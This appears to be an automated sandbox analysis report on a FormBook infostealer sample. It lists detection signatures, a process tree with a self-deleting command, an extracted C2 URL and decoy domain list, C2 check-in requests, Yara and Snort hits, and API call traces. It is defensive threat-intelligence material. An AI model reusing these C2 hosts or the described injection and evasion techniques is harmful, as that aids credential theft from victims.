
Analysis Report Y4U48592345670954.exe

Overview

General Information

Sample Name: Y4U48592345670954.exe
Analysis ID: 383918
MD5: e8e69391d3a931e6638adaebf6a339f6
SHA1: 29c02e786c6f8b343bc0f05a1195ff5215d21e63
SHA256: 20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Y4U48592345670954.exe (PID: 7016 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
    • Y4U48592345670954.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 2628 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5052 cmdline: /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
2.1.Y4U48592345670954.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.Y4U48592345670954.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
2.1.Y4U48592345670954.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
2.2.Y4U48592345670954.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.Y4U48592345670954.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Antivirus detection for URL or domain
Source: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w | Avira URL Cloud: Label: malware
Source: http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D | Avira URL Cloud: Label: malware
Source: http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (the extracted C2 list and decoy domains are given in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Y4U48592345670954.exe | Virustotal: Detection: 17%
Source: Y4U48592345670954.exe | ReversingLabs: Detection: 16%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE
Source: 2.1.Y4U48592345670954.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.NETSTAT.EXE.32fe660.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.Y4U48592345670954.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.NETSTAT.EXE.3d6f834.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Y4U48592345670954.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: netstat.pdbGCTL | source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb | source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb | source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
Source: Binary string: wntdll.pdbUGP | source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Y4U48592345670954.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004026BC FindFirstFileA,0_2_004026BC
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 4x nop then pop ebx 2_2_00407B02
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 4x nop then pop ebx 2_1_00407B02
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop ebx 4_2_00D57B02

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.middlehambooks.com/klf/
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1 | Host: www.contecoliving.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1 | Host: www.identityofplace.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1 | Host: www.constipationhub.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1 | Host: www.tententacleshydro.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
Source: unknown | DNS traffic detected: queries for: www.contecoliving.com
Source: NETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmp | String found in binary or memory: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same eight MEMORY dumps and six UNPACKEDPE files listed under "Yara detected FormBook" in AV Detection above.

          System Summary:

          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419D60 NtCreateFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419E10 NtReadFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419E90 NtClose
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419F40 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419D5A NtCreateFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419DB4 NtReadFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00419E0A NtReadFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB95D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9820 NtEnumerateKey
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBB040 NtSuspendThread
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9950 NtQueueApcThread
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9A10 NtQuerySection
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9B00 NtSetValueKey
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBAD30 NtSetContextThread
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9560 NtWriteFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB96D0 NtCreateKey
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9670 NtQueryInformationProcess
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9650 NtQueryValueKey
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9FE0 NtCreateMutant
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9770 NtSetInformationFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BBA770 NtOpenThread
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BB9760 NtOpenProcess
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419D60 NtCreateFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419E10 NtReadFile
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419E90 NtClose
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_1_00419F40 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A10 NtQuerySection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9A20 NtResumeThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AB040 NtSuspendThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9760 NtOpenProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AA770 NtOpenThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038AAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_038A9560 NtWriteFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69D60 NtCreateFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69E90 NtClose
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69E10 NtReadFile
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69F40 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4_2_00D69DB4 NtReadFile
